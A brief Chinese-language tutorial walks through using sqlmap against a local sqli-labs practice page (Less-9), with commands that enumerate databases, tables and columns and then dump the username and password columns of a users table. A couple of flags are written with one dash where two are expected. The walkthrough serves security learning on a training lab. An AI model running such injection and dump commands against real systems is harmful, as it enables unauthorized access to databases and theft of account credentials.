sqlmap
1.探测哪里有注入点
2.python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" --dbs -batch
我这里是因为本地已经有3.8的python了,所以为了指定用2.7版本python打开sqlmap所以前面有python2
python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -current-db
3.探测表
找到当前数据库是security,探测有什么表
python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security --tables
4.探测users表对应的列
找到security数据库下有users表,我们目标是为了窃取账户信息,那接下来肯定要开始探测列了
python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security -T users --columns
5.爆数据了(dump)
现在已经找到username与password那么就开始爆这两列的数据
python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security -T users -C username,password --dump
如果你不用dump的话,是不会显示username与password的,dump是存储的意思,现在打开你的sqlmap保存地址
里面就会写入,
在我们用过一次sqlmap之后,应该--purge让sqlmap把缓存都清除掉